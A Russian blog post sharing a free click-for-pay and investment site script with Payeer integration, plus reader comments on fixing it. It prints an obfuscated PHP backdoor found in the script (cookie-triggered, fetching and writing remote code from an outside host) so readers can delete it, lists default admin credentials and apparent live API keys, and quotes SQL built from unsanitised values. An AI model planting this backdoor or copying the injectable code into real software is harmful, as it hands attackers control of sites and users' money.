Скрипт букса BuxInvest
Скрипт букса BuxInvest
Сегодня выложу Скрипт букса BuxInvest. . И так что он из себя представляет. Данный скрипт типичный букс созданный на основе движка фруктовой фермы. Работающий с платежкой Payeer.
В нем имеется серфинг ссылок, баннеров добавил задания имеется ежедневный бонус. Есть возможность инвестирования от этого и название. Собственно это скрипт для тех кто хочет совместить букс, хайп и бонусник в одном сайте.
Так выглядит страница профиля.
Это бонусы
И инвестиции.
Админка
Админка как у всякой фермы сложностью не отличается
. Для входа в админку используем адрес http://Ваш сайт.сом/?menu=adminka
Логин adminRU
Пароль KaligulA
Логин с паролем можно сменить в админке
Как видно из картинки имеется небольшие косяки с кодировкой но на функционал это не влияет.
Собственно судя по админке ее собрали из нескольких ферм на скорую руку тем не менее то что нужно работает исправно.
Установка скрипта на хостинг
Данный скрипт устанавливается на хостинг так же как и ему подобные. Для этого заливаем файлы на хостинг и создаем базу данных.
Потом ищем файл _class.config.php в нем нужно прописать информацию по базе данных
<?PHP
class config{
public $HostDB = «localhost«; Обычно так и остается смотреть на хостинге
public $UserDB = «zzzzzzzzz«; Пользователь базы данных
public $PassDB = «zzzzzzzzz«; Пароль к базе данных
public $BaseDB = «zzzzzzzzz«; Название базы данных
public $SYSTEM_START_TIME = 1455711243; Дата старта проекта в формате Unix
public $VAL = «пїЅпїЅпїЅ.»; Валюта сайт вместо каракуль пишем Rub.
# PAYEER пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ
public $AccountNumber = ‘zzzzzzzzz‘;
public $apiId = ‘zzzzzzzzzzz‘; Подключение выплат
public $apiKey = ‘vorZg14zJ7lnKEIR‘;
public $shopID = 434270571;
public $secretW = «YF7VsPjpMl«; Подключение пополнений
public $all_inserts_action = ‘0‘; // Дополнительный процент при пополнении
}
?>
Синим обозначено то что меняется
При подключении платежек требуются адреса обработчика платежа адрес для успешной и не успешной оплаты.
http://Ваш сайт/payeer_merchant.php адрес обработчика
http://Ваш сайт/fail.html адрес для не успешной оплаты
http://Ваш сайт/success.html адрес для успешной оплаты
Ошибки и уязвимости
Как упоминал ранее были ошибки с кодировкой во всех значимых местах исправил. Так же не хватало немного картинок добавил. Остальное вроде работает без проблем.
С уязвимостями сложнее было их немного но одна довольно серьезная кто то себе оставил окно для входа сканер ее обнаружил и показал хотя варианта исправления не предложил в таком случае нужно просто удалить фрагмент. Выглядела она так
} if (!isset($_COOKIE[base64_decode(‘X3ltXl1cw==’)])) { @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29tL3Av’).$_SERVER[‘HTTP_HOST’]); @setcookie(base64_decode(‘X3X2l1cw==’), 1, time() 31536000, ‘/’, $_SERVER[‘HTTP_HOST’]); } if (isset($_COOKIE[base64_decode(‘cmVkNHU=’)])) { @file_put_contents(base64_decode(‘c3hdGUucGhw’), @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29L2QudHh0’))); }
Позволяла взломщику через куки без проблем делать все что угодно
Дополнительно
Для разнообразия стоит сменить дизайн самая большая картинка bgstat.png размер картинки 1349х602
Сменить ее не сложно для этого заливаем новую картинку с названием bgstat.png в папку /img
Логотип это картинка logo.png в этой же папке размер 380х75
Вроде все остальное в процессе работы разберем.
При серфинге не происходит пере направление на сайт рекламодателя. А так вроде норм.
При переходе в задания появляется Меню
Table ‘u287593_1.db_jobs’ doesn’t exist
это означает что в базе данных нет таблицы для заданий
А как добавить и как подкоректировать баннеры с платежкой не сходятся.СПАСИБО!!!
Немного не понял о каких баннерах идет речь
в рекламные материалы не отображается банер.подскажите как исправить
а это баннер для для привлечения рефералов понял сейчас посмотрю
В общем смотрите откройте файл /pages/account/_reklama.php и замените вот этот кусок после Баннер 468*60
Единственное что тот баннер что там есть от какого то проекта я бы на вашем месте залил бы свой его нужно загружать в папку /banner имя картинки 468.gif по аналогии можете вставить и другие размеры баннеров добавляет кусок кода с редактированием размеров баннера и его имени заливает в папку и тд
Коментарии для таких дел явно не подходят просьба писать на форуме
смотрите на форуме http://mexanus.ru/forum/?view=thread&id=19#postid-1301
После регистрации не заходит в кабинет! Была такая проблема?
У меня такой проблемы не было посмотрите версию пхп я проверял на 5.3 на 5.6 также должно работать
на php 5.6 работает
всё работает,подскажите как в бд добавить сетку для заданий
Насчет сетки не понял о какой сетке идет речь может таблицу допускаю что я ее забыл поставить так как задания добавлял отдельно. Скажите что пишет когда Вы добавляете задание ?
пишет отсутствует таблица в бд
Table ‘p70225xi_12345.db_jobs’ doesn’t exist
Пускай доберусть до компьютера добавлю
вот ссылка на базу данных в которой есть таблицы заданий можете поменять ее целиком либо взять нужные таблици отдельно https://drive.google.com/open?id=1pGR5oQb9ydelo-sTtk9Zj5qyYg_2uYpB
здорово!спасибо!всё работает
Скажите, каким сканером вы сканируете на уязвимости?
Нажмите на надпись вверху сайта Не забудьте проверить скрипт на уязвимость
можете памочь с сайтом ато серфинг не идет тоест все работает а с баланса не снимаеться
сколька будит стоить чтоб на мой сайт прописать серфинг ссылок зарание спасибо
интересная ошибка нужны подробности особо интересует версия PHP так как у меня это работает версия 5.6 насчет сколько это будет стоить то я помогаю на добрых началах и предпочитаю говорить на Ваше усмотрение.
хорошо у меня все работает а вот чтото с баланса не паполняеться
серфинг идет на баланс зачисляеться все норм а вот чтоб паполнить ссылку проблема
может у вас скайп есть
какая версия PHP у Вас используется ?
у меня через бегет
я скайпом не пользуюсь бегет это хостинг посмотрите версию php обычно в настройках домена глянуть можно кстати бегет не особо жалуют кто то говорил что вплоть до того что деньги подкрадают
ВЕРСИЯ 5.6
function submitform(formnum)
{
if (document.forms[‘payform’+formnum].pay_order) {
var field = document.forms[‘payform’+formnum].pay_order.value;
var minsum = $(‘#minsum’+formnum).text();
var tm;
function hidemsg()
{
$(‘#entermsg’+formnum).fadeOut(‘slow’);
if ™
clearTimeout(tm);
}
field = field.replace(«,», «.»);
if (field == ») {
document.getElementById(‘entermsg’+formnum).innerHTML = «Введите необходимую сумму»;
document.getElementById(‘entermsg’+formnum).style.display = »;
tm = setTimeout(function() {
hidemsg()
}, 1000);
return false;
}
rprice = parseFloat(field);
if (isNaN(rprice)) {
document.getElementById(‘entermsg’+formnum).innerHTML = «Значение должно быть числовым»;
document.getElementById(‘entermsg’+formnum).style.display = »;
tm = setTimeout(function() {
hidemsg()
}, 1000);
return false;
}
if (rprice != field) {
document.getElementById(‘entermsg’+formnum).innerHTML = «Значение должно быть числовым»;
document.getElementById(‘entermsg’+formnum).style.display = »;
tm = setTimeout(function() {
hidemsg()
}, 1000);
return false;
}
if (rprice < minsum) {
document.getElementById('entermsg'+formnum).innerHTML = "Сумма должна быть не менее «+minsum+» руб.»;
document.getElementById(‘entermsg’+formnum).style.display = »;
tm = setTimeout(function() {
hidemsg()
}, 1000);
return false;
}
var rnote = document.forms[‘payform’+formnum].pay_adv.value;
var rart = document.forms[‘payform’+formnum].pay_mode.value;
var rcnt = document.forms[‘payform’+formnum].pay_cnt.value;
senddatacart(rnote, rart, rprice, rcnt);
return true;
}
return false;
}
ВОТ ИМЕННО ЭТОТ КУСОК НЕ ЧИТАЕТ
странно может я не понял о чем речь вот тестовый сайт скажите у меня этот нюанс работает или нет http://test4.mexanus.ru
НУ ДА У ВАС РАБОТАЕТ ПАПОЛНЕНИЕ
ЯЖ ГАВАРЮ ПЕРЕЙДИТЕ НА МОЙ САЙТ
тут могут быть какие нюансы хостинга у меня это работает
У МЕНЯ САЙТ ДРУГОЙ А НЕ ЭТОТ НО ПРИНЦИП ТОТЖЕ
давайте ссылку но от того что я посмотрю сайт проблема не пропадет тут беда в хостинге и что не так с хостингом я понятия не имею
ну так все работает проста не паполняет баланс и все
если сайт другой то это меняет дело мне нужно глянуть на сайт
что для этого нада
я так понимаю к бонуснику добавили серфинг нужно смотреть на файлы по поводу ошибок то там есть подсказка в какой строке она находится
я эту ошубку как толька не переделовал все ноль
стоит попробовать взять файлы серфинга со скрипта в котором пополнение работает
так паможете с ошибкой
я взял вот результат
там не одна ошибка там их целый букет советую найти в интернете модуль серфинг для фруктовой фермы и поставить его вместо этого так будет проще
нужно брать не с этого скрипта
что бы решить проблему мне нужен скрипт с базой данных что бы я установил его у себя
так все работает ведь серфинг ставиться смотриться на баланс добавляеться после просмотра и все остальное но вот паполнить ссылку серфинга не паполняет
я и в серфинге ошибку вижу причем фатальную
Fatal error: Uncaught exception ‘Exception’ with message ‘Serialization of ‘SimpleXMLElement’ is not allowed’ in [no active file]:0 Stack trace: #0 {main} thrown in [no active file] on line 0
это я исправлю
щас добавлю серфинг гляните
сматрите а то нижнее я исправлю
ошибка никуда не делась поищите в файле серфинга (((ipgeobase.ru:7020/geo?ip= )))и попробуйте написать вот так ((ipgeobase.ru:7020/geo?ip=1.2.3.4)))
все то исправил
ошибка пропала
в любом случае мне нужно смотреть файлы я бы удалил тот серфинг что там есть и всунул новый
вот все работает проста не паполняет ссылку и все
так давайте дам доступ гляните
глянуть я смогу только с понедельника там просто посмотреть не получится в идеале мне поставить скрипт у себя
ладна тогда до понедельника
я вам отправил он ждет модерации думаю что все будет норм и палучиться серфинг
вижу единственное файлы это хорошо но там нет базы данных
ну скажите если палучиться
установил ужасный скрипт ошибок море попробую всунуть серфинг по новому но потребуется значительная переделка база данных совсем на фруктовую ферму не похожа
возможно проще будет взять скрипт фермы с понравившимся дизайном выкинуть от туда лишнее добавить линкслота оставить бонус и добавить серфинг тут чем дальше тем страшнее
работы так валом будит
case 12:
$money = $result[‘price’];
{
$users_info[‘balance’] — $money ;
{
$db->query(«UPDATE db_serfing2 SET `money` = `money` + ‘».$money.»‘ WHERE id = ‘».$adv.»‘»);
$db->query(«UPDATE PREFaccounts SET `balance` = `balance` — ‘».$money.»‘ WHERE id = ‘».$_SESSION[‘user’].»‘»);
exit(‘1’);
}
{
exit(‘NO MONEY’);
}
}
break;
default:
break;
}
}
exit(‘no4’);
?>
он палучаеться не читает это кусок
я еще до этого не добрался да и мне кажется не очень хорошая идея использовать серфинг что там есть
насчет той картинки с no4 это не ошибка тут какое то условие не выполнено нужно все перебирать
в этом файле us-advservice.ctrl.php проста ведь все работает серфинг идет все идет а паполнение нет
я понимаю еслиб серфинг не шол или полностью не работал это да а так все работает серфинг добавляеться включаеться выключаеться удаляеться все окей ведь а вот толька пополнение не работает
я сам эксперементирую может найду подходящую пропись может вы разберетесь
посмотрим загадывать пока рано
насчет пополнения я не вижу в скрипте файла serfing.js
ну что что то получилось
не так быстро тут все напутано завтра с утра раскидаю все по папкам как оно должно быть суть ошибки в том что нет ссылки на библиотеку js либо она в другом месте тут надо рабиратся
если что бонусник секундный подгоню оригинальный полностью защищен может продадите
да проблема уже что толька с этим js не делал
вся беда в том что там не одна проблема первую ошибку я решил но вслед за ней вылезла другая вот тестовый сайт http://test8.mexanus.ru/
боюсь это дохлый номер тут нужно все файлы переделывать вот ссылка на файл ошибки я убрал _serfing_cabinet.ctrl.php https://drive.google.com/open?id=1Y1dxmq-A0N7xA8aYlDbF5RB7ngE5r_iw решаешь одну проблему появляется другая js не мой конек рекомендую забить на этот скрипт и взять скрипт фермы
По поводу секундного бонусника создал раздел на форуме Куплю/Продам выложите его описание контакты для связи кто то да купит у меня спрашивали пару недель назад такой но я продать не могу люди скидывают скрипты для ремонта не поймут если я начну их продавать.
я разобрался все сделал
И что там было ? бонусник скачал выставлю на продажу но вначале немного изменю его там разберемся.
нет проста сделал чтоб сразу когда выставляют указывали ссуму и переходы и все
можно и так но все же проблема не решена я бы все таки взял скрипт фф дело бы пошло веселее отличие бы получилось только в регистрации
я наю но замарачиваться и так неделю мозг парил
Оставте какие то контакты для связи типа почты скрипт я уже начал переделывать как закончу выставлю на продажу
us-stepserf.ctrl.php может подскажите вот в этом файле у меня что нужно прописать чтоб при просмотре и раззгадывании капчи выкидывало на тот сайт который сматрели
немного не понял не работает или Вы хотите сделать что бы постоянно выкидывало на сайт ?
вот эта строка отвечает за это $move = ($result[‘move’] == 1) ? $result[‘url’] : 0;
она у меня не работает
это снова js я кстати не вижу в вашем скрипте файла serfing.js а вообще надо подумать как обойтись без жавы
все сделал я переход пропарился долго и сделал
значит нужно браться за что то другое
да я уже все сделал серфинг внешнию рекламу мониторинг майнинг можна теперь отдыхать и развивать
задания ?
Шамиль
все сделал я переход пропарился долго и сделал
————————————————————————
Не подскажите как исправили?
стоит подметить что у него свой скрипт только серфинг взял с фермы
ну да мой сайт но серфинг взял с ферм
Это мой бывший проект, крипт не безопасен! Останетесь без своих денег! Даже пароль и Логин мой для входа в админку не заменили…..
Пользуясь бесплатными скриптами всегда есть возможность потерять деньги потому нужно удалять уязвимости а в идеале вообще отказатся от автовыплат. К этому скрипту имеется возможность добавить модуль ручных выплат от фруктовой фермы.